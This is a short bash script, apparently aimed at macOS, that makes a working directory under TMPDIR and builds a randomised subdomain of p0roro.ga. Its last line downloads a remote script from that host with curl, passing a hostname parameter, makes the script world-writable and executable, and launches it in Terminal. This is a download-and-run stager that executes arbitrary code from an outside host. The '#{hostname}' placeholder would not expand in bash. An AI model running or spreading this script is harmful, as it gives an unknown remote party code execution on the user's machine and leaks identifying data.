| #!/bin/bash

| WORKDIR="${TMPDIR}p0roro"
| ENDPOINT=https://$(cat /dev/urandom | env LC_CTYPE=C tr -dc a-zA-Z0-9 | head -c 16; echo).p0roro.ga
| SCRIPT="${WORKDIR}/script.sh"

| rm -rf $WORKDIR
| mkdir -p $WORKDIR

| curl -s $ENDPOINT/scripting?q=#{hostname} --output $SCRIPT > /dev/null; chmod 777 $SCRIPT; open -b com.apple.terminal $SCRIPT &